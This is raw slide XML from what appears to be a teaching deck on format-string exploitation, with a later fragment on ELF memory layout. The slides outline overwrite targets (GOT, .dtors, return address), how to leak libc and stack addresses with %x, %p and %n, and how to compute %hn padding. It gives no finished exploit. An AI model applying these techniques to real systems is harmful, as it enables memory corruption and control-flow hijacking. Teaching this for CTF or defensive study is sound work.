      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2104" name="Shape 2104"/>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Format String Code Exec</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2105" name="Shape 2105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ret address on stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.dtors</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>readelf -s a.out |grep DTOR</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>	29: 08049518 	0 OBJECT  LOCAL  DEFAULT   19 __DTOR_LIST__</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>	56: 0804951c 	0 OBJECT  GLOBAL HIDDEN   19 __DTOR_END__</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>__atexit</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>...you name it</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>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2109"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2110" name="Shape 2110"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read / write any position if map permission is allowed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GOT hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write variable value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak libc base address and calculate offset to get another function address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak libc version</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak stack address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2111" name="Shape 2111"/>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Format String Usage</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2115"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2116" name="Shape 2116"/>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Format String Strategy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2117" name="Shape 2117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak Info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use %x %p to leak stack info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To leak arbitrary addr info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf on stack, write addr in buf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf not on stack, write addr pointer on stack first, then use another printf to leak</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write Data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If dest addr not known, leak addr first(mostly stack)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf on stack, use addr in buf (Libformatstr can help)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf not on stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Common way: use ebp-&gt;ebp pair (or sth similar) to change arbitrary addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If using snprintf, then write addr first using %n (suitable for 0x0804xxx)</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2121"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2122" name="Shape 2122"/>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Format String tricks and gotchas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2123" name="Shape 2123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: How to calculate positional param?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A: Libc said that the behavior is undefined if positional param position is larger than provided non-positional param count. But for most case, the addr should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>word_size x position </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>So it’s more easier to open your gdb and use pattern string to find the actual position instead of calculating. Besides, %0$x is not recognised.</a:t>
            </a:r>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: What if the second %n needs a small value to be written while bytes_written just goes larger?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: Just use integer overflow. (For example, if %hn applies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>second_padding=(second_size+65536-first_padding) % 65536 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953381" y="1240934"/>
            <a:ext cx="8285238"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磁盘中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（可执行文件）与内存中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（进程内存映像）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Shape 740">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB5F305-A1DB-4C02-BDEF-DC6932DB5002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6388014" y="2416947"/>
            <a:ext cx="3580234" cy="3707900"/>
            <a:chOff x="4897550" y="1085100"/>
            <a:chExt cx="2768700" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Shape 741">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224FE4C8-1E87-428D-AF07-083B8BF5CFE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1212775"/>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rPr>
                <a:t>For Kernel</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Shape 742">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFAF310-7ADD-4648-AC81-A755F5404CB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1486975"/>
              <a:ext cx="1363200" cy="2742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Stack</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Shape 743">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F579983-D946-419B-9E9A-CAC8423EC60E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1761175"/>
              <a:ext cx="1363200" cy="603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 name="Shape 744">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE967AF-B2C7-4C2E-A3CF-DCF61E9CCE05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2365075"/>
              <a:ext cx="1363200" cy="44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shared libraries</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Shape 745">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C4FD20-8637-4BD7-BCA0-E25276816B1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2807875"/>
              <a:ext cx="1363200" cy="603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 name="Shape 746">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010999C0-C7EE-4429-80E6-4D7C1F73C6DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3411775"/>
              <a:ext cx="1363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Heap</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Shape 747">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D47F4C6-7252-41C7-A01C-95FF5B1D73A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3685975"/>
              <a:ext cx="1363200" cy="274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Data</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Shape 748">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3064F38-82FD-43F8-8742-542BED83C265}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3960175"/>
              <a:ext cx="1363200" cy="2742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Code</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Shape 749">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FFC1073-413A-4427-B54D-090BD34DFF40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="4234375"/>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Unused</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Shape 750">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
